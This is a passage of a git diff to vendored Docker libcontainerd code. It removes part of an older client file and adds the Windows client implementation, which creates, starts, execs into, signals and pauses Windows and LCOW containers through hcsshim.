int(syscall.SIGTERM)); err != nil { - logrus.Errorf("libcontainerd: error sending sigterm to %v: %v", containerID, err) - } - // Let the main loop handle the exit event - clnt.remote.Unlock() - select { - case <-time.After(10 * time.Second): - if err := clnt.Signal(containerID, int(syscall.SIGKILL)); err != nil { - logrus.Errorf("libcontainerd: error sending sigkill to %v: %v", containerID, err) - } - select { - case <-time.After(2 * time.Second): - case <-w.wait(): - // relock because of the defer - clnt.remote.Lock() - return nil - } - case <-w.wait(): - // relock because of the defer - clnt.remote.Lock() - return nil - } - // relock because of the defer - clnt.remote.Lock() - - clnt.deleteContainer(containerID) - - return clnt.setExited(containerID, uint32(255)) -} - -func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return err - } - - _, err := clnt.remote.apiClient.CreateCheckpoint(context.Background(), &containerd.CreateCheckpointRequest{ - Id: containerID, - Checkpoint: &containerd.Checkpoint{ - Name: checkpointID, - Exit: exit, - Tcp: true, - UnixSockets: true, - Shell: false, - EmptyNS: []string{"network"}, - }, - CheckpointDir: checkpointDir, - }) - return err -} - -func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return err - } - - _, err := clnt.remote.apiClient.DeleteCheckpoint(context.Background(), &containerd.DeleteCheckpointRequest{ - Id: containerID, - Name: checkpointID, - CheckpointDir: checkpointDir, - }) - return err -} - -func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return nil, err - } - - resp, err := clnt.remote.apiClient.ListCheckpoint(context.Background(), &containerd.ListCheckpointRequest{ - Id: containerID, - CheckpointDir: checkpointDir, - }) - if err != nil { - return nil, err - } - return (*Checkpoints)(resp), nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go new file mode 100644 index 0000000000..6e3454e514 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go @@ -0,0 +1,1319 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path" + "path/filepath" + "regexp" + "strings" + "sync" + "syscall" + "time" + + "github.com/Microsoft/hcsshim" + opengcs "github.com/Microsoft/opengcs/client" + "github.com/containerd/containerd" + "github.com/containerd/containerd/cio" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" +) + +const InitProcessName = "init" + +type process struct { + id string + pid int + hcsProcess hcsshim.Process +} + +type container struct { + sync.Mutex + + // The ociSpec is required, as client.Create() needs a spec, but can + // be called from the RestartManager context which does not otherwise + // have access to the Spec + ociSpec *specs.Spec + + isWindows bool + manualStopRequested bool + hcsContainer hcsshim.Container + + id string + status Status + exitedAt time.Time + exitCode uint32 + waitCh chan struct{} + init *process + execs map[string]*process + updatePending bool +} + +// Win32 error codes that are used for various workarounds +// These really should be ALL_CAPS to match golangs syscall library and standard +// Win32 error conventions, but golint insists on CamelCase. +const ( + CoEClassstring = syscall.Errno(0x800401F3) // Invalid class string + ErrorNoNetwork = syscall.Errno(1222) // The network is not present or not started + ErrorBadPathname = syscall.Errno(161) // The specified path is invalid + ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object +) + +// defaultOwner is a tag passed to HCS to allow it to differentiate between +// container creator management stacks. We hard code "docker" in the case +// of docker. +const defaultOwner = "docker" + +func (c *client) Version(ctx context.Context) (containerd.Version, error) { + return containerd.Version{}, errors.New("not implemented on Windows") +} + +// Create is the entrypoint to create a container from a spec. +// Table below shows the fields required for HCS JSON calling parameters, +// where if not populated, is omitted. +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | | Isolation=Process | Isolation=Hyper-V | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | VolumePath | \\?\\Volume{GUIDa} | | +// | LayerFolderPath | %root%\windowsfilter\containerID | | +// | Layers[] | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID | +// | HvRuntime | | ImagePath=%root%\BaseLayerID\UtilityVM | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// +// Isolation=Process example: +// +// { +// "SystemType": "Container", +// "Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Owner": "docker", +// "VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}", +// "IgnoreFlushesDuringBoot": true, +// "LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "5e0055c814a6", +// "MappedDirectories": [], +// "HvPartition": false, +// "EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"], +//} +// +// Isolation=Hyper-V example: +// +//{ +// "SystemType": "Container", +// "Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d", +// "Owner": "docker", +// "IgnoreFlushesDuringBoot": true, +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "475c2c58933b", +// "MappedDirectories": [], +// "HvPartition": true, +// "EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"], +// "DNSSearchList": "a.com,b.com,c.com", +// "HvRuntime": { +// "ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM" +// }, +//} +func (c *client) Create(_ context.Context, id string, spec *specs.Spec, runtimeOptions interface{}) error { + if ctr := c.getContainer(id); ctr != nil { + return errors.WithStack(newConflictError("id already in use")) + } + + // spec.Linux must be nil for Windows containers, but spec.Windows + // will be filled in regardless of container platform. This is a + // temporary workaround due to LCOW requiring layer folder paths, + // which are stored under spec.Windows. + // + // TODO: @darrenstahlmsft fix this once the OCI spec is updated to + // support layer folder paths for LCOW + if spec.Linux == nil { + return c.createWindows(id, spec, runtimeOptions) + } + return c.createLinux(id, spec, runtimeOptions) +} + +func (c *client) createWindows(id string, spec *specs.Spec, runtimeOptions interface{}) error { + logger := c.logger.WithField("container", id) + configuration := &hcsshim.ContainerConfig{ + SystemType: "Container", + Name: id, + Owner: defaultOwner, + IgnoreFlushesDuringBoot: spec.Windows.IgnoreFlushesDuringBoot, + HostName: spec.Hostname, + HvPartition: false, + } + + if spec.Windows.Resources != nil { + if spec.Windows.Resources.CPU != nil { + if spec.Windows.Resources.CPU.Count != nil { + // This check is being done here rather than in adaptContainerSettings + // because we don't want to update the HostConfig in case this container + // is moved to a host with more CPUs than this one. + cpuCount := *spec.Windows.Resources.CPU.Count + hostCPUCount := uint64(sysinfo.NumCPU()) + if cpuCount > hostCPUCount { + c.logger.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount) + cpuCount = hostCPUCount + } + configuration.ProcessorCount = uint32(cpuCount) + } + if spec.Windows.Resources.CPU.Shares != nil { + configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares) + } + if spec.Windows.Resources.CPU.Maximum != nil { + configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Maximum) + } + } + if spec.Windows.Resources.Memory != nil { + if spec.Windows.Resources.Memory.Limit != nil { + configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024 + } + } + if spec.Windows.Resources.Storage != nil { + if spec.Windows.Resources.Storage.Bps != nil { + configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps + } + if spec.Windows.Resources.Storage.Iops != nil { + configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops + } + } + } + + if spec.Windows.HyperV != nil { + configuration.HvPartition = true + } + + if spec.Windows.Network != nil { + configuration.EndpointList = spec.Windows.Network.EndpointList + configuration.AllowUnqualifiedDNSQuery = spec.Windows.Network.AllowUnqualifiedDNSQuery + if spec.Windows.Network.DNSSearchList != nil { + configuration.DNSSearchList = strings.Join(spec.Windows.Network.DNSSearchList, ",") + } + configuration.NetworkSharedContainerName = spec.Windows.Network.NetworkSharedContainerName + } + + if cs, ok := spec.Windows.CredentialSpec.(string); ok { + configuration.Credentials = cs + } + + // We must have least two layers in the spec, the bottom one being a + // base image, the top one being the RW layer. + if spec.Windows.LayerFolders == nil || len(spec.Windows.LayerFolders) < 2 { + return fmt.Errorf("OCI spec is invalid - at least two LayerFolders must be supplied to the runtime") + } + + // Strip off the top-most layer as that's passed in separately to HCS + configuration.LayerFolderPath = spec.Windows.LayerFolders[len(spec.Windows.LayerFolders)-1] + layerFolders := spec.Windows.LayerFolders[:len(spec.Windows.LayerFolders)-1] + + if configuration.HvPartition { + // We don't currently support setting the utility VM image explicitly. + // TODO @swernli/jhowardmsft circa RS5, this may be re-locatable. + if spec.Windows.HyperV.UtilityVMPath != "" { + return errors.New("runtime does not support an explicit utility VM path for Hyper-V containers") + } + + // Find the upper-most utility VM image. + var uvmImagePath string + for _, path := range layerFolders { + fullPath := filepath.Join(path, "UtilityVM") + _, err := os.Stat(fullPath) + if err == nil { + uvmImagePath = fullPath + break + } + if !os.IsNotExist(err) { + return err + } + } + if uvmImagePath == "" { + return errors.New("utility VM image could not be found") + } + configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath} + + if spec.Root.Path != "" { + return errors.New("OCI spec is invalid - Root.Path must be omitted for a Hyper-V container") + } + } else { + const volumeGUIDRegex = `^\\\\\?\\(Volume)\{{0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}\}\\$` + if _, err := regexp.MatchString(volumeGUIDRegex, spec.Root.Path); err != nil { + return fmt.Errorf(`OCI spec is invalid - Root.Path '%s' must be a volume GUID path in the format '\\?\Volume{GUID}\'`, spec.Root.Path) + } + // HCS API requires the trailing backslash to be removed + configuration.VolumePath = spec.Root.Path[:len(spec.Root.Path)-1] + } + + if spec.Root.Readonly { + return errors.New(`OCI spec is invalid - Root.Readonly must not be set on Windows`) + } + + for _, layerPath := range layerFolders { + _, filename := filepath.Split(layerPath) + g, err := hcsshim.NameToGuid(filename) + if err != nil { + return err + } + configuration.Layers = append(configuration.Layers, hcsshim.Layer{ + ID: g.ToString(), + Path: layerPath, + }) + } + + // Add the mounts (volumes, bind mounts etc) to the structure + var mds []hcsshim.MappedDir + var mps []hcsshim.MappedPipe + for _, mount := range spec.Mounts { + const pipePrefix = `\\.\pipe\` + if mount.Type != "" { + return fmt.Errorf("OCI spec is invalid - Mount.Type '%s' must not be set", mount.Type) + } + if strings.HasPrefix(mount.Destination, pipePrefix) { + mp := hcsshim.MappedPipe{ + HostPath: mount.Source, + ContainerPipeName: mount.Destination[len(pipePrefix):], + } + mps = append(mps, mp) + } else { + md := hcsshim.MappedDir{ + HostPath: mount.Source, + ContainerPath: mount.Destination, + ReadOnly: false, + } + for _, o := range mount.Options { + if strings.ToLower(o) == "ro" { + md.ReadOnly = true + } + } + mds = append(mds, md) + } + } + configuration.MappedDirectories = mds + if len(mps) > 0 && system.GetOSVersion().Build < 16299 { // RS3 + return errors.New("named pipe mounts are not supported on this version of Windows") + } + configuration.MappedPipes = mps + + hcsContainer, err := hcsshim.CreateContainer(id, configuration) + if err != nil { + return err + } + + // Construct a container object for calling start on it. + ctr := &container{ + id: id, + execs: make(map[string]*process), + isWindows: true, + ociSpec: spec, + hcsContainer: hcsContainer, + status: StatusCreated, + waitCh: make(chan struct{}), + } + + logger.Debug("starting container") + if err = hcsContainer.Start(); err != nil { + c.logger.WithError(err).Error("failed to start container") + ctr.debugGCS() + if err := c.terminateContainer(ctr); err != nil { + c.logger.WithError(err).Error("failed to cleanup after a failed Start") + } else { + c.logger.Debug("cleaned up after failed Start by calling Terminate") + } + return err + } + ctr.debugGCS() + + c.Lock() + c.containers[id] = ctr + c.Unlock() + + logger.Debug("createWindows() completed successfully") + return nil + +} + +func (c *client) createLinux(id string, spec *specs.Spec, runtimeOptions interface{}) error { + logrus.Debugf("libcontainerd: createLinux(): containerId %s ", id) + logger := c.logger.WithField("container", id) + + if runtimeOptions == nil { + return fmt.Errorf("lcow option must be supplied to the runtime") + } + lcowConfig, ok := runtimeOptions.(*opengcs.Config) + if !ok { + return fmt.Errorf("lcow option must be supplied to the runtime") + } + + configuration := &hcsshim.ContainerConfig{ + HvPartition: true, + Name: id, + SystemType: "container", + ContainerType: "linux", + Owner: defaultOwner, + TerminateOnLastHandleClosed: true, + } + + if lcowConfig.ActualMode == opengcs.ModeActualVhdx { + configuration.HvRuntime = &hcsshim.HvRuntime{ + ImagePath: lcowConfig.Vhdx, + BootSource: "Vhd", + WritableBootSource: false, + } + } else { + configuration.HvRuntime = &hcsshim.HvRuntime{ + ImagePath: lcowConfig.KirdPath, + LinuxKernelFile: lcowConfig.KernelFile, + LinuxInitrdFile: lcowConfig.InitrdFile, + LinuxBootParameters: lcowConfig.BootParameters, + } + } + + if spec.Windows == nil { + return fmt.Errorf("spec.Windows must not be nil for LCOW containers") + } + + // We must have least one layer in the spec + if spec.Windows.LayerFolders == nil || len(spec.Windows.LayerFolders) == 0 { + return fmt.Errorf("OCI spec is invalid - at least one LayerFolders must be supplied to the runtime") + } + + // Strip off the top-most layer as that's passed in separately to HCS + configuration.LayerFolderPath = spec.Windows.LayerFolders[len(spec.Windows.LayerFolders)-1] + layerFolders := spec.Windows.LayerFolders[:len(spec.Windows.LayerFolders)-1] + + for _, layerPath := range layerFolders { + _, filename := filepath.Split(layerPath) + g, err := hcsshim.NameToGuid(filename) + if err != nil { + return err + } + configuration.Layers = append(configuration.Layers, hcsshim.Layer{ + ID: g.ToString(), + Path: filepath.Join(layerPath, "layer.vhd"), + }) + } + + if spec.Windows.Network != nil { + configuration.EndpointList = spec.Windows.Network.EndpointList + configuration.AllowUnqualifiedDNSQuery = spec.Windows.Network.AllowUnqualifiedDNSQuery + if spec.Windows.Network.DNSSearchList != nil { + configuration.DNSSearchList = strings.Join(spec.Windows.Network.DNSSearchList, ",") + } + configuration.NetworkSharedContainerName = spec.Windows.Network.NetworkSharedContainerName + } + + // Add the mounts (volumes, bind mounts etc) to the structure. We have to do + // some translation for both the mapped directories passed into HCS and in + // the spec. + // + // For HCS, we only pass in the mounts from the spec which are type "bind". + // Further, the "ContainerPath" field (which is a little mis-leadingly + // named when it applies to the utility VM rather than the container in the + // utility VM) is moved to under /tmp/gcs//binds, where this is passed + // by the caller through a 'uvmpath' option. + // + // We do similar translation for the mounts in the spec by stripping out + // the uvmpath option, and translating the Source path to the location in the + // utility VM calculated above. + // + // From inside the utility VM, you would see a 9p mount such as in the following + // where a host folder has been mapped to /target. The line with /tmp/gcs//binds + // specifically: + // + // / # mount + // rootfs on / type rootfs (rw,size=463736k,nr_inodes=115934) + // proc on /proc type proc (rw,relatime) + // sysfs on /sys type sysfs (rw,relatime) + // udev on /dev type devtmpfs (rw,relatime,size=498100k,nr_inodes=124525,mode=755) + // tmpfs on /run type tmpfs (rw,relatime) + // cgroup on /sys/fs/cgroup type cgroup (rw,relatime,cpuset,cpu,cpuacct,blkio,memory,devices,freezer,net_cls,perf_event,net_prio,hugetlb,pids,rdma) + // mqueue on /dev/mqueue type mqueue (rw,relatime) + // devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000) + // /binds/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/target on /binds/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/target type 9p (rw,sync,dirsync,relatime,trans=fd,rfdno=6,wfdno=6) + // /dev/pmem0 on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/layer0 type ext4 (ro,relatime,block_validity,delalloc,norecovery,barrier,dax,user_xattr,acl) + // /dev/sda on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch type ext4 (rw,relatime,block_validity,delalloc,barrier,user_xattr,acl) + // overlay on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/rootfs type overlay (rw,relatime,lowerdir=/tmp/base/:/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/layer0,upperdir=/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch/upper,workdir=/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch/work) + // + // /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc # ls -l + // total 16 + // drwx------ 3 0 0 60 Sep 7 18:54 binds + // -rw-r--r-- 1 0 0 3345 Sep 7 18:54 config.json + // drwxr-xr-x 10 0 0 4096 Sep 6 17:26 layer0 + // drwxr-xr-x 1 0 0 4096 Sep 7 18:54 rootfs + // drwxr-xr-x 5 0 0 4096 Sep 7 18:54 scratch + // + // /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc # ls -l binds + // total 0 + // drwxrwxrwt 2 0 0 4096 Sep 7 16:51 target + + mds := []hcsshim.MappedDir{} + specMounts := []specs.Mount{} + for _, mount := range spec.Mounts { + specMount := mount + if mount.Type == "bind" { + // Strip out the uvmpath from the options + updatedOptions := []string{} + uvmPath := "" + readonly := false + for _, opt := range mount.Options { + dropOption := false + elements := strings.SplitN(opt, "=", 2) + switch elements[0] { + case "uvmpath": + uvmPath = elements[1] + dropOption = true + case "rw": + case "ro": + readonly = true + case "rbind": + default: + return fmt.Errorf("unsupported option %q", opt) + } + if !dropOption { + updatedOptions = append(updatedOptions, opt) + } + } + mount.Options = updatedOptions + if uvmPath == "" { + return fmt.Errorf("no uvmpath for bind mount %+v", mount) + } + md := hcsshim.MappedDir{ + HostPath: mount.Source, + ContainerPath: path.Join(uvmPath, mount.Destination), + CreateInUtilityVM: true, + ReadOnly: readonly, + } + mds = append(mds, md) + specMount.Source = path.Join(uvmPath, mount.Destination) + } + specMounts = append(specMounts, specMount) + } + configuration.MappedDirectories = mds + + hcsContainer, err := hcsshim.CreateContainer(id, configuration) + if err != nil { + return err + } + + spec.Mounts = specMounts + + // Construct a container object for calling start on it. + ctr := &container{ + id: id, + execs: make(map[string]*process), + isWindows: false, + ociSpec: spec, + hcsContainer: hcsContainer, + status: StatusCreated, + waitCh: make(chan struct{}), + } + + // Start the container. + logger.Debug("starting container") + if err = hcsContainer.Start(); err != nil { + c.logger.WithError(err).Error("failed to start container") + ctr.debugGCS() + if err := c.terminateContainer(ctr); err != nil { + c.logger.WithError(err).Error("failed to cleanup after a failed Start") + } else { + c.logger.Debug("cleaned up after failed Start by calling Terminate") + } + return err + } + ctr.debugGCS() + + c.Lock() + c.containers[id] = ctr + c.Unlock() + + c.eventQ.append(id, func() { + ei := EventInfo{ + ContainerID: id, + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventCreate, + }).Info("sending event") + err := c.backend.ProcessEvent(id, EventCreate, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": id, + "event": EventCreate, + }).Error("failed to process event") + } + }) + + logger.Debug("createLinux() completed successfully") + return nil +} + +func (c *client) Start(_ context.Context, id, _ string, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(id) + switch { + case ctr == nil: + return -1, errors.WithStack(newNotFoundError("no such container")) + case ctr.init != nil: + return -1, errors.WithStack(newConflictError("container already started")) + } + + logger := c.logger.WithField("container", id) + + // Note we always tell HCS to create stdout as it's required + // regardless of '-i' or '-t' options, so that docker can always grab + // the output through logs. We also tell HCS to always create stdin, + // even if it's not used - it will be closed shortly. Stderr is only + // created if it we're not -t. + var ( + emulateConsole bool + createStdErrPipe bool + ) + if ctr.ociSpec.Process != nil { + emulateConsole = ctr.ociSpec.Process.Terminal + createStdErrPipe = !ctr.ociSpec.Process.Terminal + } + + createProcessParms := &hcsshim.ProcessConfig{ + EmulateConsole: emulateConsole, + WorkingDirectory: ctr.ociSpec.Process.Cwd, + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: createStdErrPipe, + } + + if ctr.ociSpec.Process != nil && ctr.ociSpec.Process.ConsoleSize != nil { + createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width) + } + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env) + if ctr.isWindows { + createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ") + } else { + createProcessParms.CommandArgs = ctr.ociSpec.Process.Args + } + createProcessParms.User = ctr.ociSpec.Process.User.Username + + // LCOW requires the raw OCI spec passed through HCS and onwards to + // GCS for the utility VM. + if !ctr.isWindows { + ociBuf, err := json.Marshal(ctr.ociSpec) + if err != nil { + return -1, err + } + ociRaw := json.RawMessage(ociBuf) + createProcessParms.OCISpecification = &ociRaw + } + + ctr.Lock() + defer ctr.Unlock() + + // Start the command running in the container. + newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms) + if err != nil { + logger.WithError(err).Error("CreateProcess() failed") + return -1, err + } + defer func() { + if err != nil { + if err := newProcess.Kill(); err != nil { + logger.WithError(err).Error("failed to kill process") + } + go func() { + if err := newProcess.Wait(); err != nil { + logger.WithError(err).Error("failed to wait for process") + } + if err := newProcess.Close(); err != nil { + logger.WithError(err).Error("failed to clean process resources") + } + }() + } + }() + p := &process{ + hcsProcess: newProcess, + id: InitProcessName, + pid: newProcess.Pid(), + } + logger.WithField("pid", p.pid).Debug("init process started") + + dio, err := newIOFromProcess(newProcess, ctr.ociSpec.Process.Terminal) + if err != nil { + logger.WithError(err).Error("failed to get stdio pipes") + return -1, err + } + _, err = attachStdio(dio) + if err != nil { + logger.WithError(err).Error("failed to attache stdio") + return -1, err + } + ctr.status = StatusRunning + ctr.init = p + + // Spin up a go routine waiting for exit to handle cleanup + go c.reapProcess(ctr, p) + + // Generate the associated event + c.eventQ.append(id, func() { + ei := EventInfo{ + ContainerID: id, + ProcessID: InitProcessName, + Pid: uint32(p.pid), + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventStart, + "event-info": ei, + }).Info("sending event") + err := c.backend.ProcessEvent(ei.ContainerID, EventStart, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": id, + "event": EventStart, + "event-info": ei, + }).Error("failed to process event") + } + }) + logger.Debug("start() completed") + return p.pid, nil +} + +func newIOFromProcess(newProcess hcsshim.Process, terminal bool) (*cio.DirectIO, error) { + stdin, stdout, stderr, err := newProcess.Stdio() + if err != nil { + return nil, err + } + + dio := cio.NewDirectIO(createStdInCloser(stdin, newProcess), nil, nil, terminal) + + // Convert io.ReadClosers to io.Readers + if stdout != nil { + dio.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) + } + if stderr != nil { + dio.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) + } + return dio, nil +} + +// Exec adds a process in an running container +func (c *client) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(containerID) + switch { + case ctr == nil: + return -1, errors.WithStack(newNotFoundError("no such container")) + case ctr.hcsContainer == nil: + return -1, errors.WithStack(newInvalidParameterError("container is not running")) + case ctr.execs != nil && ctr.execs[processID] != nil: + return -1, errors.WithStack(newConflictError("id already in use")) + } + logger := c.logger.WithFields(logrus.Fields{ + "container": containerID, + "exec": processID, + }) + + // Note we always tell HCS to + // create stdout as it's required regardless of '-i' or '-t' options, so that + // docker can always grab the output through logs. We also tell HCS to always + // create stdin, even if it's not used - it will be closed shortly. Stderr + // is only created if it we're not -t. + createProcessParms := hcsshim.ProcessConfig{ + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: !spec.Terminal, + } + if spec.Terminal { + createProcessParms.EmulateConsole = true + if spec.ConsoleSize != nil { + createProcessParms.ConsoleSize[0] = uint(spec.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(spec.ConsoleSize.Width) + } + } + + // Take working directory from the process to add if it is defined, + // otherwise take from the first process. + if spec.Cwd != "" { + createProcessParms.WorkingDirectory = spec.Cwd + } else { + createProcessParms.WorkingDirectory = ctr.ociSpec.Process.Cwd + } + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(spec.Env) + if ctr.isWindows { + createProcessParms.CommandLine = strings.Join(spec.Args, " ") + } else { + createProcessParms.CommandArgs = spec.Args + } + createProcessParms.User = spec.User.Username + + logger.Debugf("exec commandLine: %s", createProcessParms.CommandLine) + + // Start the command running in the container. + newProcess, err := ctr.hcsContainer.CreateProcess(&createProcessParms) + if err != nil { + logger.WithError(err).Errorf("exec's CreateProcess() failed") + return -1, err + } + pid := newProcess.Pid() + defer func() { + if err != nil { + if err := newProcess.Kill(); err != nil { + logger.WithError(err).Error("failed to kill process") + } + go func() { + if err := newProcess.Wait(); err != nil { + logger.WithError(err).Error("failed to wait for process") + } + if err := newProcess.Close(); err != nil { + logger.WithError(err).Error("failed to clean process resources") + } + }() + } + }() + + dio, err := newIOFromProcess(newProcess, spec.Terminal) + if err != nil { + logger.WithError(err).Error("failed to get stdio pipes") + return -1, err + } + // Tell the engine to attach streams back to the client + _, err = attachStdio(dio) + if err != nil { + return -1, err + } + + p := &process{ + id: processID, + pid: pid, + hcsProcess: newProcess, + } + + // Add the process to the container's list of processes + ctr.Lock() + ctr.execs[processID] = p + ctr.Unlock() + + // Spin up a go routine waiting for exit to handle cleanup + go c.reapProcess(ctr, p) + + c.eventQ.append(ctr.id, func() { + ei := EventInfo{ + ContainerID: ctr.id, + ProcessID: p.id, + Pid: uint32(p.pid), + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExecAdded, + "event-info": ei, + }).Info("sending event") + err := c.backend.ProcessEvent(ctr.id, EventExecAdded, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExecAdded, + "event-info": ei, + }).Error("failed to process event") + } + err = c.backend.ProcessEvent(ctr.id, EventExecStarted, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExecStarted, + "event-info": ei, + }).Error("failed to process event") + } + }) + + return pid, nil +} + +// Signal handles `docker stop` on Windows. While Linux has support for +// the full range of signals, signals aren't really implemented on Windows. +// We fake supporting regular stop and -9 to force kill. +func (c *client) SignalProcess(_ context.Context, containerID, processID string, signal int) error { + ctr, p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + ctr.manualStopRequested = true + + logger := c.logger.WithFields(logrus.Fields{ + "container": containerID, + "process": processID, + "pid": p.pid, + "signal": signal, + }) + logger.Debug("Signal()") + + if processID == InitProcessName { + if syscall.Signal(signal) == syscall.SIGKILL { + // Terminate the compute system + if err := ctr.hcsContainer.Terminate(); err != nil { + if !hcsshim.IsPending(err) { + logger.WithError(err).Error("failed to terminate hccshim container") + } + } + } else { + // Shut down the container + if err := ctr.hcsContainer.Shutdown(); err != nil { + if !hcsshim.IsPending(err) && !hcsshim.IsAlreadyStopped(err) { + // ignore errors + logger.WithError(err).Error("failed to shutdown hccshim container") + } + } + } + } else { + return p.hcsProcess.Kill() + } + + return nil +} + +// Resize handles a CLI event to resize an interactive docker run or docker +// exec window. +func (c *client) ResizeTerminal(_ context.Context, containerID, processID string, width, height int) error { + _, p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + c.logger.WithFields(logrus.Fields{ + "container": containerID, + "process": processID, + "height": height, + "width": width, + "pid": p.pid, + }).Debug("resizing") + return p.hcsProcess.ResizeConsole(uint16(width), uint16(height)) +} + +func (c *client) CloseStdin(_ context.Context, containerID, processID string) error { + _, p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + return p.hcsProcess.CloseStdin() +} + +// Pause handles pause requests for containers +func (c *client) Pause(_ context.Context, containerID string) error { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + if ctr.ociSpec.Windows.HyperV == nil { + return errors.New("cannot pause Windows Server Containers") + } + + ctr.Lock() + defer ctr.Unlock() + + if err = ctr.hcsContainer.Pause(); err != nil { + return err + } + + ctr.status = StatusPaused + + c.eventQ.append(containerID, func() { + err := c.backend.ProcessEvent(containerID, EventPaused, EventInfo{ + ContainerID: containerID, + ProcessID: InitProcessName, + }) + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventPaused, + }).Info("sending event") + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": containerID, + "event": EventPaused, + }).Error("failed to process event") + } + }) + + return nil +} + +// Resume handles resume requests for containers +func (c *client) 